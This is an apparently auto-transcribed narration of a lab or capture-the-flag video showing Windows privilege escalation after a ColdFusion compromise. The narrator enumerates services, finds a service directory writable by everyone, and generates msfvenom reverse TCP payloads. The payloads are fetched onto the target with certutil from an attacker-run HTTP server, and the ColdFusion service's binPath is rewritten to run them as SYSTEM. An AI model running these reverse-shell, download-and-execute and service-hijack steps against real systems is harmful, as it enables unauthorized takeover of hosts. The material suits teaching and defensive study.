Okay, this is the second part. And now after we have exploited Adobe Coldfusion and we were able to get limited shell on Windows box, our next step is to escalate our privilege. Given that we know what are the current privileges of the current user, as you can see, we can set impersonate privilege, and we have done that before. Now, here, let's see how we can escalate our privilege on the Windows box by enumerating the services. Now, to see the list of the current services, we type WMIC service get name, get, okay, here name, and then we get the display name of the service, path name, start mode. So here we enumerate the running services on Windows. We want to find a service that is not Microsoft, not built by Microsoft, right? And at the same time, it's not standard service, and this service has weak permissions on it, on the files that it executes. So let's find out. So these are the running services right now. As we can see here, all of these services are kinda built into the system except. So everything, guys, here, Windows System 32, Windows System 32, all of these services are built with Windows, not standard. But we see here, we want to look for the services that are not standard. So we can see here, we have Amazon, WinHub, and we have Cold, which is for Coldfusion. Now, both of these services mode of start is manual. So I want to know, guys, my next step, I want to know if these two services or the directories containing the services are, of weak file, have weak file permissions, right? So let's go down and list the non-standard services to have a compact view of of our targets. So WMIC service get name, display name, path name, start mode, and let's pipe the output to find stri. Want to find the auto started services, auto, and you're gonna pipe that as well to find string -i -v, and here I'm gonna pop in quotes, C, getting the backslash here. Let's go with backslash. And Windows. Oh, what was that? So our session has died. Let's explode the session again. And let's copy the command. So whenever I run this, the session dies. Okay. All right. So what we can do here, we can upgrade our shell. The shell dies every second. So what we can do here, we can, or let me try first install my utility. So do we have iCals on the system? iCals. Oh, we have iCals on the system. So over here, guys, what we're gonna do, we're gonna go up and find the service we are interested in. So the service is kinda this one. Let's take that, copy. So, and here we type iCals, the service name. So what does that mean? codes. So I want to see if that directory is writable or not of this service. Let's type I here. Again, it has died. Okay, so on the left, horizontal, let me do sudo msfm -p windows meta operator verse tcp lhost. It's going to be 10 10 0.4 lport 4555. Row, and we put payload or what? Exploitation. Okay. So I want to put some kind of, I don't want to re-establish the session all the time, so I'm going to upgrade that to metapreter. So here we're going to start Python 3-m http.server 8000, and on the Windows box, so on the Windows box here, we're going to download the utility from my server, from my machine, cert utility, and dash URL cache dash f http 10 10 0 24 8000. What? Cert utility? Okay. Grab all that. I don't want to rest again. The connection with the server couldn't be established. Bad request. Ls. Where's the exploit here? It's node sudo. What was that? Okay, we forgot 7. So here, let's type the command again. Come on, you're kidding me. Let's go to the browser. Ah, it's the purpose suite, the fucking purpose suite. Let's cancel all the proxies. No proxy. Go back. Terminal. And let's paste that again. This is real shit here. Why I cannot download the script? HTTP without HTTPS. That was the problem. Okay. So 10, 10, 0, 24. Okay. So the executable file or the payload has been uploaded. Let's find out. Okay, it's here. Now let's run a listener on our machine, clear ncldp. I think let's go up. We should have changed the port. Now it's not going to work. Let's try. 4545. No, not here, man. And down there, X3. Yeah. So here, let's do recreate the payload with different ports. That's why it doesn't work. Sudo msf. There's TCP host 4546 -f x2 Okay, now the next step, we will launch Metasploit. And we're going to download the executable file again. Here goes to. All right, so you're going to start handler, use exploit multi handler, set payload windows interpreter first TCP, set lhost 10 10 24, set lport 4546, run. Now let's run the executable file. All right, so now we get Metapreter session opened. So we have upgraded our shell here. Now let's go back and see the services running and see what is the vulnerable service among the services, guys. So here, let's list the current services or the non-standard services. So we type wimc or drop shell, wimc, and here service get name, display name, we point the path name, and start mode, find str -i auto started with the boot, find str -i -b, and here we put C and the backslash Windows. Let's see, guys, what we got here. We are looking for the non-standard services that are started with the startup. So here we get nothing. Okay, now previously we were able to enumerate the services and we found out some service, but let's enumerate that again. There we are, C service, get name, then display name, path name, start. So the service I'm interested in is the one associated with Coldfusion. Coldfusion, where are you? So see a couple of services with Coldfusion here. One, two, Jetty, this is the Jetty one. And we have this one, we have this, and that. So we have four, like, wait, one, two, three, four. But the ones I am interested in enumerating, guys, are these ones. So let's find out if if the directory containing these services, right, is writable. Directory is C program files, and we have C Coldfusion 2018. Let's go down, and let's use a tool called iCalcs, and we define the directory path, which is this case, and here is our Coldfusion. Let's go up, 2018. So define name, directory name is incorrect. A backslash. Oh, come on. The file name, directory name, or volume label syntax is incorrect. Why? Let's see here the help with this tool. Okay, so this is a syntax. So iCalcs, and the directory name. I don't see anything wrong with our comments. Okay, all right. So here we type C without the codes. Maybe it's the codes. Coldfusion. So here are the permissions of this directory, guys. And it seems that the users can write to this directory, right? As you can see here. Now, our next step, guys, is to let, we need to run the, where is it? So remember our reverse shell back then we have created. We're gonna need to make sure, let's go up here and find the tool or the service path, go down. Okay, so we have Jetty. Let's make that. Okay. So the first one is this one, right? So instead of running this tool or this executable file, we need to let Coldfusion run our payload, which we have created earlier. And we have this one, Coldfusion 2018 application server, and it is running this app Coldfusion svc.exe, right? So our mission, guys, here is to replace one of these executable files with our payload. Let's go down. So if I am where? Okay. So if I'm in a place where I want to choose between one of these, let's go back up here. So here I am more inclined to choose this service, right? This path. So instead of running call.exe, I'm going to configure the service, right, to run my shell or my payload, right? So we can do that definitely since we have write access, as you can see, or write permission on the same directory. We can do whatever we want. So what we're going to do here, we're going to type sc config cold bin path equal, and here we're going to type the full path to this to the directory or to the file. So here I'm going to type bin, and instead of typing cold.exe, we're going to type the name of our shell. Or before that, let me make sure we have the shell here. So exp2.exe, we're going to run that sc config cold bin path equal. Okay. Oh, come on, no. So we copy the path. And then we copy the backslash to.exe. Okay. And now we're going to do here, we're going to go back. Let's run this first. So as you can see, guys, we have overwritten the configuration of the service, and now it's running exp to our payload, as you can see, guys, instead of the actual application. Why? Because it has write permissions for everyone. Now let's go to Metasploit. Which one? Let's collapse this, or let's terminal and do new one, vertical, MSF console, and here use exploit multi handler, show sessions, market sessions. So set payload windows emitter reverse TCP. What? Oh my god. Windows emitter TCP set lhost and then 024 set lport to 4546 as I remember, and we're gonna run. Let's do that again here. We should be able to receive a session back from here. And there might be some problem. So let's exit the, and we have here background sessions -I. We have one on port 4546. We're gonna let's see here. Wait. Directory. Okay. So we're gonna kill one. Or what do you think? Okay, let me set sessions or sessions. Okay, let me go back to my sessions. All right, shell. Okay, so seems like because we are listing on the same port, we have to receive the connection. Let's go back and let's exit the interpreter down there. Create a new payload, sudo msf venom -p Windows better reverse TCP lhost equal 192 10 0 24 and port equal 4547 as of exe and exp3.exe. Carry rolling. What I'm gonna do now, guys, I'm gonna import this payload to the Windows box and replace it with the service we have exploited. So here we're gonna run Python 3 -m http dot what was that? Server 8000. Now let's go to, okay, we are on the machine here, Windows box. We go to Windows box and we run cert util URL cache -f http 10 0 24 8000 xp3, and the output file will be this one. That is great. Now let's exit the shell. Yes. So over here, I'm going to type background show sessions or sessions.I. So we have one. Now let's set new one, create a new session. Or leave this separate. I prefer that. Let me leave this separate and run a new one here. So horizontally, MSF console. No, not here. Here. Okay, sessions -I1. Shell. So let's see here, and our new payload has been downloaded. Now the next step is to, as you remember, guys, we're going to configure the service to run our payload instead. Let me configure the listener down there. Set use exploit multi-handler set payload Windows better reverse TCP set lhost 19 10 04 set lport. It's going to be 4547. When you run the handler, what? Ah, set lhost 10 024. Run. All right. Now over there, here, we're gonna rerun the command again. sc config, and the name of the service is cold, as you remember, and the bin and the path we want is, Let's put the full path. I hate stupid shells. The most thing I hate in the world is stupid shells. Okay, now we get that. The payload name is exp0.exe, and we run. And let's see if we get the connection back on the right, lower right. So I'm waiting for the connection here. Let's hope we get the all right. Seems like I forgot something. Yeah, we need to start the service. Start, since it's not automatically started. So let's type service start cold. The system cannot find the file specified. Where is it? Start cold. Start service failed. Ooh, directory. The file is here. C Coldfusion, C Fusion, bin shell exp3. Let me run the tool again, or the command. We forgot. We didn't end the code. Yeah. Okay. So here we put code and sc start cold. Again, we got the same stuff. Okay. We change that to sc start cold. I get the same stuff. Let me do another enumeration for the services. There will be imc service get name, display name, path name, start mode. Coldfusion. So as you can see here, Coldfusion is set to run my file, but the service is not running, and I cannot start it. See Coldfusion. The path is right. Okay. All right. So it seems like we need to, okay, let's go down. Let's copy that. And we type here again, cconfig cold bin path equal. Let me try without the quotes. Oh, what happened? The copy paste is very lame. Config cold bin path equal. So let's copy that. Backslash 3.exe. Sc cold start cold. Yeah, so we got the shell back. So here, let's maximize that. And let's drop the shell. Who am I? And we are a system. So we have successfully escalated our privilege using a non-standard service configured incorrectly to allow write permissions, right, for everyone. That was the problem. Okay, we can actually, let me tell you something, guys. We can here avoid the session being died. So we can do here, let's close that. What was that? Okay, so you can set exit on session false. Let me make sure from my manual that I typed that correctly. We go to Metasploit. Mm, seems like or let me type migrate auto. Okay, so here we're going to use that. So once the metapreter session open, we're going to migrate to another process. All right. So this one, we're going to copy it and go back, paste that here, true, and we're going to type, let's go back to our manual and see what kind of, I think what we need to do here, guys, we need to start the migration automatically, right? So the autorun script here need to be an auto run script, and we're going to specify the path for the migration. Post Windows and manage, and here we're going to type migrate. Run, and we're going to run the tool again here. Sc called start. What was this? Ah, no. Shell sc start cold. So you received the session. Now we need to migrate, but as you can see, we couldn't find post Windows Manager. Oh, it's not manager, it's my problem. Okay, let me cancel it. Show sessions I killed 2. That's great. Okay, set auto run script. Let's go up. It's manage. So run. And here sc start cold. Now we should be able to migrate now automatically without letting the session die. Let's see here. So the session has died again. So as you can see, guys, the session died before I was able to migrate. Ironic. Migrate if run sc start code. Let's see if this works. Please migrate before the session dies. Migrate before the session dies. I mean, in real case scenarios, you're going to be able to migrate your MetaPreter session into a new process before the session dies. But sorry, since this is a test machine, that's why it's happening. Okay, no problem. No problem at all. So that's how we were able to, exploit or escalate our privilege. I hope this was enjoyable, and we see you in the next video.